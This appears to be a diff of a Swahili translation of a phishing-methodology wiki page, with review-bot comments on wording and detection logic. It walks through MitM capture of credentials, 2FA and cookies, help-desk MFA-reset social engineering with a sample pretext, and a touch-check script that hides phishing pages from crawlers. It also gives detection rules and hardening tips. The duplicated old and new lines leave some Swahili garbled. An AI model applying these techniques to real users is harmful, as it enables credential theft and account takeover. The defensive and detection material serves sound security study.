2. Mtumiaji **anatuma** **credentials** zake kwenye ukurasa wako bandia na zana inazituma kwa ukurasa halisi, **kukagua kama credentials zinafanya kazi**.
3. Ikiwa akaunti imewekwa na **2FA**, ukurasa wa MitM utaomba hiyo na mara **mtumiaji anapoiingiza** zana itaipeleka kwenye ukurasa halisi.
4. Mara mtumiaji akithibitishwa wewe (kama mshambuliaji) utakuwa umekamata **credentials, 2FA, cookie na taarifa yoyote** ya kila mwingiliano wakati zana inafanya MitM.
### Via VNC
Je, badala ya **kumtamisha mwathiriwa kwenye ukurasa wa uhalifu** unaoonekana kama wa awali, ungeweza kumpeleka kwenye **kikao cha VNC chenye browser iliyounganishwa kwenye ukurasa halisi**? Utaweza kuona anachofanya, kuiba password, MFA iliyotumika, cookies...\
Unaweza kufanya hivi kwa kutumia [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)
Je, vipi ikiwa badala ya **kumpeleka mhusika kwenye ukurasa wa ulaghai** unaoonekana kama asili, unampeleka kwenye **vituo vya VNC na browser iliyounganika kwenye ukurasa halisi**? Utaweza kuona anachofanya, kuiba nenosiri, MFA iliyotumika, cookies...\
Unaweza kufanya hili na [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)
## Detecting the detection
Obvious moja ya njia bora za kujua kama umeuawa ni **kutafuta domain yako ndani ya blacklists**. Ikiwa inaonekana imeorodheshwa, kwa namna fulani domain yako iligunduliwa kama shaka.\
Njia moja rahisi ya kukagua kama domain yako inaonekana kwenye blacklist ni kutumia [https://malwareworld.com/](https://malwareworld.com)
Kwa wazi mojawapo ya njia bora za kujua kama umegunduliwa ni **kutafuta domain yako ndani ya blacklists**. Ikiwa inaonekana kwenye orodha, kwa namna fulani domain yako ilitambuliwa kama ya kutiliwa shaka.\
Njia rahisi ya kuangalia kama domain yako inaonekana kwenye blacklist yoyote ni kutumia [https://malwareworld.com/](https://malwareworld.com)
Hata hivyo, kuna njia nyingine za kujua kama mwathiriwa anatafuta kwa uangalifu shughuli za phishing zenye shaka kama ilivyoelezwa kwenye:
Hata hivyo, kuna njia nyingine za kujua kama mhusika **anatafuta kwa umakini shughuli za phishing zinazoshukiwa** kama ilivyoelezwa katika:
{{#ref}}
detecting-phising.md
{{#endref}}
Unaweza **kununua domain yenye jina linalofanana sana** na domain ya mwathiriwa **na/au kuzalisha certificate** kwa **subdomain** ya domain unayodhibiti **lenye** **keyword** ya domain ya mwathiriwa. Ikiwa **mwathiriwa** atafanya aina yoyote ya mwingiliano wa **DNS au HTTP** nao, utajua kuwa **yeye anatafuta kwa ufanisi** domains zenye shaka na utahitaji kuwa mwiba sana.
Unaweza **kununua domain yenye jina linalofanana sana** na domain ya mwathiri **na/au kuunda certificate** kwa **subdomain** ya domain inayodhibitiwa na wewe **inayoambatanisha** **keyword** ya domain ya mwathiri. Ikiwa **mwathiri** atafanya aina yoyote ya **DNS au HTTP interaction** nayo, utajua kwamba **yeye anaangalia kwa makini** kwa ajili ya domains zinazoshukiwa na utahitaji kuwa sana mnyonge.
### Evaluate the phishing
Tumia [**Phishious** ](https://github.com/Rices/Phishious) kutathmini kama email yako itaishia kwenye spam folder au itazuiliwa au itafanikiwa.
Tumia [**Phishious** ](https://github.com/Rices/Phishious)kuangalia kama barua pepe yako itamalizika katikati ya folda ya spam au ikiwa itazuiliwa au itafanikiwa.
## High-Touch Identity Compromise (Help-Desk MFA Reset)
Sets za uvamizi wa kisasa mara nyingi hupuuza malengo ya email kabisa na **hufokusisha moja kwa moja mchakato wa service-desk / identity-recovery** ili kuondoa MFA. Shambulio hilo ni kamili "living-off-the-land": mara operator anapomiliki credentials halali wanapitia na zana za admin zilizojengwa hakuna malware inayohitajika.
Seti za uvamizi za kisasa mara nyingi zinapita uhamasishaji wa barua pepe kabisa na **kuwakwabua moja kwa moja utaratibu wa service-desk / identity-recovery** ili kuvunja MFA. Shambulio hutegemea kabisa "living-off-the-land": mara operator anapokuwa na credentials halali wanabadilisha kwa zana za admin zilizo ndani hakuna malware inayohitajika.
### Attack flow
1. Recon ya mwathiriwa
* Pata maelezo ya binafsi & ya kampuni kutoka LinkedIn, data breaches, public GitHub, n.k.
* Tambua identities zenye thamani kubwa (maafisa wakuu, IT, fedha) na weka orodha ya **hasa ya mchakato wa help-desk** kwa reset ya password / MFA.
2. Social engineering kwa wakati halisi
* Piga simu, tumia Teams au chat kwa help-desk ukijinakili kuwa ni eneo lengwa (mara nyingi kwa **spoofed caller-ID** au **cloned voice**).
* Toa PII iliyokusanywa ili kupita uthibitishaji wa maarifa.
* Mshawishi afanye **reset ya MFA secret** au kufanya **SIM-swap** kwenye namba ya simu iliyosajiliwa.
3. Hatua za mara moja baada ya kupata (≤60 min katika kesi halisi)
* Anzisha foothold kupitia portal yoyote ya web SSO.
* Ordoza AD / AzureAD kwa kutumia built-ins (bila kupeleka binaries):
1. Recon kwa mhusika
* Kukusanya maelezo binafsi & ya kampuni kutoka LinkedIn, data breaches, public GitHub, n.k.
* Tambua vitambulisho vyenye thamani kubwa (wakuu, IT, fedha) na orodhesha **mchakato wa help-desk** kwa usahihi kwa ajili ya reset ya password / MFA.
2. Social engineering ya wakati-halisi
* Simu, Teams au chat help-desk huku ukijifanya kuwa mhusika (mara nyingi kwa **spoofed caller-ID** au **cloned voice**).
* Toa PII iliyokusanywa awali ili kupita ukaguzi wa maarifa.
* Mshawishi agent afanye **reset ya MFA secret** au kufanya **SIM-swap** kwa namba ya simu iliyosajiliwa.
3. Hatua za mara moja baada ya kupata ufikiaji (≤60 min kwa matukio halisi)
* Tumia njia ya msingi kupitia web SSO portal yoyote kuanzisha foothold.
* Ordo AD / AzureAD kwa zana zilizojengwa (bila kupeleka binaries):
```powershell
# list directory groups & privileged roles
Get-ADGroup -Filter * -Properties Members | ?{$_.Members -match $env:USERNAME}
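Review bot: "taarifa hizi hazitatumika kukufanya ujifikirie kama mtumiaji aliyepigwa wizi" misreads the source: "impersonate the tricked user" became "make you think of yourself as the robbed user". Suggest "hazitakuwezesha kujifanya kuwa mtumiaji aliyedanganywa". Three more in this hunk: "utahitaji kuwa sana mnyonge" renders "stealthy" as "mnyonge" (weak, miserable) and should be something like "utahitaji kuwa mwangalifu sana / kutoonekana"; "Ordo AD / AzureAD kwa zana zilizojengwa" is not a Swahili word, the old "Ordoza" was also wrong, and "Orodhesha AD / AzureAD" is the translation of "Enumerate"; and the link text "[EvilnVNC]" does not match the repository name in its own URL (`JoelGMSec/EvilnoVNC`) on both the old and new line.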
@ -467,56 +467,56 @@ Get-MgDirectoryRole | ft DisplayName,Id
# Enumerate devices the account can login to
Get-MgUserRegisteredDevice -UserId <user@corp.local>
```
* Kuhamia upande wa ndani kwa kutumia **WMI**, **PsExec**, au agents halali za **RMM** ambazo tayari zimewekwa kwenye whitelist ndani ya mazingira.
* Mwendo wa pande (lateral movement) kwa **WMI**, **PsExec**, au wakala halali wa **RMM** tayari waliowekwa kwenye whitelist ya mazingira.
### Detection & Mitigation
* Tibu help-desk identity recovery kama **operesheni ya kipaumbele** hitaji step-up auth & idhini ya manager.
* Tumia **Identity Threat Detection & Response (ITDR)** / **UEBA** rules zinazotia alarm juu ya:
* MFA method changed + authentication kutoka kwenye device / geo mpya.
* Kuongezeka mara moja kwa ruhusa kwa mfano huo huo (user-→-admin).
* Rekodi simu za help-desk na lipa utekelezaji wa **call-back kwa namba iliyosajiliwa tayari** kabla ya reset yoyote.
* Tekeleza **Just-In-Time (JIT) / Privileged Access** ili akaunti zilizorekebishwa hivi karibuni **zisipate** token za uenyekiti wa juu moja kwa moja.
* Tibu identity recovery ya help-desk kama **operesheni yenye vibali** hitaji step-up auth & approval ya manager.
* Tengeneza kanuni za **Identity Threat Detection & Response (ITDR)** / **UEBA** ambazo zinaonya juu ya:
* Mbinu ya MFA imebadilishwa + uthibitisho kutoka kifaa kipya / geo.
* Kuinuka mara moja kwa mcheleweshaji uleule (user-→-admin).
* Rekodi simu za help-desk na uweke kanuni ya **call-back kwenye namba iliyosajiliwa kabla** ya reset yoyote.
* Tekeleza **Just-In-Time (JIT) / Privileged Access** ili akaunti zilizorejeshwa hivi karibuni **zisizopata** moja kwa moja token za hali ya juu.
---
## At-Scale Deception SEO Poisoning & “ClickFix” Campaigns
Mataifa ya kawaida hupunguza gharama za operesheni za high-touch kwa shambulio la wingi linalotumia **search engines & ad networks kama njia ya utoaji**.
Mafungu ya kawaida yanagharamia gharama za operesheni za high-touch kwa mashambulizi ya wingi yanayofanya **search engines & ad networks kuwa chaneli ya utoaji**.
1. **SEO poisoning / malvertising** inasukuma matokeo ya uongo kama `chromium-update[.]site` kwenye matangazo ya juu ya search ads.
2. Mwathiriwa anapakua loader ndogo ya hatua ya kwanza (mara nyingi JS/HTA/ISO). Mifano iliyoshuhudiwa na Unit 42:
1. **SEO poisoning / malvertising** inasukuma matokeo bandia kama `chromium-update[.]site` juu ya matangazo ya utafutaji.
2. Mwathiriwa anapakua loader ndogo ya **first-stage** (mara nyingi JS/HTA/ISO). Mifano iliyoshuhudiwa na Unit 42:
* `RedLine stealer`
* `Lumma stealer`
* `Lampion Trojan`
3. Loader inatoa exfiltrate browser cookies + credential DBs, kisha inachukua **silent loader** ambayo inaamua kwa wakati halisi ikiwa itaweka:
* RAT (mfano AsyncRAT, RustDesk)
3. Loader huondoa cookies za browser + credential DBs, kisha huvuta **silent loader** ambayo inaamua *kwa wakati-halisi* kama itapeleka:
* RAT (mf. AsyncRAT, RustDesk)
* ransomware / wiper
* sehemu ya persistence (Run key ya registry + scheduled task)
* sehemu ya persistence (registry Run key + scheduled task)
### Hardening tips
* Zuia domains zilizosajiliwa hivi karibuni & tekeleza **Advanced DNS / URL Filtering** kwenye *search-ads* pamoja na e-mail.
* Zuia ufungaji wa software isipokuwa MSI / Store packages zilizosainiwa, kata utekelezaji wa `HTA`, `ISO`, `VBS` kwa sera.
* Simamia kwa ajili ya child processes za browsers zinazoanisha installers:
* Zuia domains zilizosajiliwa hivi karibuni & fanya utekelezaji wa **Advanced DNS / URL Filtering** kwa *search-ads* pamoja na barua pepe.
* Zuia usakinishaji wa software isipokuwa MSI / Store zilizosainiwa, ukatae utekelezaji wa `HTA`, `ISO`, `VBS` kwa sera.
* Sibiti kwa mfuatiliaji mchakato watoto wa browsers waliopenisha installers:
```yaml
- parent_image: /Program Files/Google/Chrome/*
and child_image: *\\*.exe
```
* Kagua LOLBins zinazotumika mara kwa mara na first-stage loaders (mfano `regsvr32`, `curl`, `mshta`).
* Tafuta LOLBins zinazotumika mara kwa mara na first-stage loaders (mf. `regsvr32`, `curl`, `mshta`).
---
## AI-Enhanced Phishing Operations
Wavamizi sasa wanachanganya **LLM & voice-clone APIs** kwa lures zilizobinafsishwa kikamilifu na mwingiliano wa wakati halisi.
Wavamizi sasa wanachanganua **LLM & voice-clone APIs** kwa lures zilizobinafsishwa kabisa na mwingiliano wa wakati-halisi.
| Layer | Mfano wa matumizi na mtoo wa vitisho |
|-------|--------------------------------------|
|Automation|Generate & send >100 k emails / SMS with randomised wording & tracking links.|
|Generative AI|Produce *one-off* emails referencing public M&A, inside jokes from social media; deep-fake CEO voice in callback scam.|
|Agentic AI|Autonomously register domains, scrape open-source intel, craft next-stage mails when a victim clicks but doesnt submit creds.|
| Layer | Mfano wa matumizi na mtendaji wa tishio |
|-------|-----------------------------|
|Automation|Tengeneza & tuma >100k emails / SMS zenye maneno yaliyobadilishwa & viungo vya tracking.|
|Generative AI|Zalisha barua pepe za *one-off* zikirejea M&A za umma, vichekesho vya ndani kutoka social media; sauti bandia ya CEO kwenye simu ya udanganyifu.|
|Agentic AI|Jisajili mwenyewe domains, scrape intel ya open-source, unda barua za hatua inayofuata wakati mwathiriwa anabonyeza lakini hakutuma creds.|
Ulinzi:
• Ongeza **dynamic banners** zinazobainisha ujumbe ulioletwa na automation isiyotumika kwa kuaminika (kupitia ARC/DKIM anomalies).
• Tekeleza **voice-biometric challenge phrases** kwa maombi ya hatari kwenye simu.
• Endelea kutekeleza majaribio ya lures zilizotengenezwa na AI katika programu za uhamasishaji templates imara zimepitwa na wakati.
**Defence:**
• Ongeza **bango zinazoibuka** zinazoonyesha ujumbe ulioletwa na automation isiyo ya kuaminika (kutokana na ARC/DKIM anomalies).
• Tumia **voice-biometric challenge phrases** kwa maombi ya simu yenye hatari kubwa.
• Endelea kufanya majaribio ya lures zilizotengenezwa na AI katika programu za uelimishaji templates za static hazifai tena.
See also agentic browsing abuse for credential phishing:
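Review bot: the detection fragment at the top of the hunk (`parent_image: /Program Files/Google/Chrome/*` with `child_image: *\\*.exe`) also matches Chrome's own child processes (chrome.exe spawning renderer/utility chrome.exe instances, plus the Google updater), so it needs an exclusion for `chrome.exe` and the Chrome install directory before it can be used as an alert; the parent glob uses forward slashes while the child glob uses backslashes, so one of them should be normalised to the platform separator. In the translation, the new "Wavamizi sasa wanachanganua" (attackers now analyse) replaces "wanachanganya" (combine) and changes the meaning: the sentence is about attackers combining LLM and voice-clone APIs, so the old verb should stay. Likewise "bango zinazoibuka" (pop-up banners) is a narrower rendering of "dynamic banners" than the line it replaces.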
@ -527,19 +527,19 @@ ai-agent-mode-phishing-abusing-hosted-agent-browsers.md
---
## MFA Fatigue / Push Bombing Variant Forced Reset
Mbali na push-bombing ya kawaida, operator wanaweza tu **lazimisha usajili mpya wa MFA** wakati wa simu ya help-desk, wakifuta token ya mtumiaji iliyokuwepo. Kumbukumbu yoyote inayofuata ya login itaonekana halali kwa mwathiriwa.
Mbali na push-bombing ya jadi, operator kwa urahisi **wanafanya rejista mpya ya MFA** wakati wa simu ya help-desk, kuharibu token iliyokuwepo ya mtumiaji. Kila ombi la kuingia linalofuata linaonekana halali kwa mhusika.
```text
[Attacker] → Help-Desk: “I lost my phone while travelling, can you unenrol it so I can add a new authenticator?”
[Help-Desk] → AzureAD: Delete existing methods → sends registration e-mail
[Attacker] → Completes new TOTP enrolment on their own device
```
Fuatilia matukio ya AzureAD/AWS/Okta ambapo **`deleteMFA` + `addMFA`** yanatokea **katika dakika chache kutoka IP ile ile**.
Fuatilia matukio ya AzureAD/AWS/Okta ambapo **`deleteMFA` + `addMFA`** yanatokea **ndani ya dakika chache kutoka kwenye IP ileile**.
## Clipboard Hijacking / Pastejacking
Wavamizi wanaweza kwa utulivu kunakili amri zenye madhara kwenye clipboard ya mwathiriwa kutoka kwenye ukurasa wa wavuti uliovamiwa au typosquatted, kisha kumdanganya mtumiaji kubandika ndani ya **Win + R**, **Win + X** au dirisha la terminal, wakitekeleza arbitrary code bila kupakua au kiambatisho.
Wavamizi wanaweza kunakili kimya kimya maagizo ya kukera kwenye clipboard ya mwathirika kutoka kwenye ukurasa wa wavuti uliobambikiwa au typosquatted, kisha kumdanganya mtumiaji kuyabandika ndani ya **Win + R**, **Win + X** au terminal window, na hivyo kuendesha code yoyote bila kupakua au kutumia attachment.
{{#ref}}
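Review bot: the detection advice at the end of the hunk contradicts the scenario above it: in the dialogue the help-desk agent deletes the existing methods from the help-desk workstation and the attacker completes the new enrolment from their own device, so the delete and the add will not share a source IP, and a same-IP correlation misses exactly this forced-reset variant. Suggest correlating on the target user instead (a method deletion performed by a help-desk/admin principal followed within minutes by a registration from a new IP or device), and saying explicitly that `deleteMFA` / `addMFA` are placeholders rather than literal event names; for example AWS CloudTrail records `DeactivateMFADevice` / `DeleteVirtualMFADevice` followed by `CreateVirtualMFADevice` / `EnableMFADevice`, Okta records `user.mfa.factor.deactivate` / `user.mfa.factor.activate`, and the Entra ID audit activities are "User deleted security info" and "User registered security info". Minor: "kuharibu token" (destroy) should be "kufuta" (delete), as in the line it replaces.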
@ -553,6 +553,33 @@ clipboard-hijacking.md
mobile-phishing-malicious-apps.md
{{#endref}}
### Mobilegated phishing to evade crawlers/sandboxes
Waendeshaji wanaziba mtiririko wao wa phishing nyuma ya ukaguzi rahisi wa kifaa ili crawlers za desktop zisifike kwenye kurasa za mwisho. Mfano wa kawaida ni script ndogo inayotesta ikiwa DOM ina uwezo wa touch na kutuma matokeo kwa server endpoint; clients zisizo za mobile hupokea HTTP 500 (au ukurasa tupu), wakati watumiaji wa mobile wanapewa mtiririko kamili.
Minimal client snippet (typical logic):
```html
<script src="/static/detect_device.js"></script>
```
`detect_device.js` mantiki (imefupishwa):
```javascript
const isMobile = ('ontouchstart' in document.documentElement);
fetch('/detect', {method:'POST', headers:{'Content-Type':'application/json'}, body: JSON.stringify({is_mobile:isMobile})})
.then(()=>location.reload());
```
Mienendo ya server inayoshuhudiwa mara nyingi:
- Huweka session cookie wakati wa mzigo wa kwanza.
- Accepts `POST /detect {"is_mobile":true|false}`.
- Inarudisha 500 (au placeholder) kwa GETs zinazofuata wakati `is_mobile=false`; inahudumia phishing tu ikiwa `true`.
Uwindaji na kanuni za utambuzi:
- urlscan query: `filename:"detect_device.js" AND page.status:500`
- Telemetry ya Web: mfululizo wa `GET /static/detect_device.js``POST /detect` → HTTP 500 kwa nonmobile; njia halali za mobile victim hurudisha 200 pamoja na HTML/JS za kuendelea.
- Zuia au chunguza kwa makini kurasa zinazotegemea yaliyomo pekee kwa `ontouchstart` au ukaguzi wa kifaa kama hicho.
Vidokezo vya ulinzi:
- Endesha crawlers zenye mobilelike fingerprints na JS imewezeshwa ili kufichua gated content.
- Toa tahadhari juu ya majibu 500 yenye shaka yanayotokea baada ya `POST /detect` kwenye domains zilizosajiliwa hivi karibuni.
## References
- [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
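Review bot: the gate in the snippet tests touch support, not "mobile": `'ontouchstart' in document.documentElement` is true on touch-screen laptops and is trivially satisfied by a crawler that enables touch emulation in headless Chromium (the `hasTouch` viewport/device option), so the defence bullet about mobile-like fingerprints should state that touch emulation plus JS execution is what defeats this check. The bullet that says to block pages relying solely on `ontouchstart` is too broad, since plenty of legitimate sites make the same check; alert on it only in combination with the `GET /static/detect_device.js` → `POST /detect` → HTTP 500 sequence. Also worth noting the reload behaviour: the client calls `location.reload()` after every POST, so it only stops reloading because the server remembers the result in the session cookie set on first load; a crawler that discards cookies will see an endless reload and should classify that as "gated", not "broken".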
@ -560,5 +587,6 @@ mobile-phishing-malicious-apps.md
- [https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/](https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc/)
- [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)
- [2025 Unit 42 Global Incident Response Report Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/)
- [Silent Smishing mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
{{#include ../../banners/hacktricks-training.md}}
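Review bot: the link text of the new Sekoia reference ("Silent Smishing mobile-gated phishing infra and heuristics") does not match the post's URL slug (silent-smishing-the-hidden-abuse-of-cellular-router-apis); use the post's actual title so readers can tell which article the mobile-gating section cites, and keep the entry in the same "title (source)" style as the Unit 42 line above it.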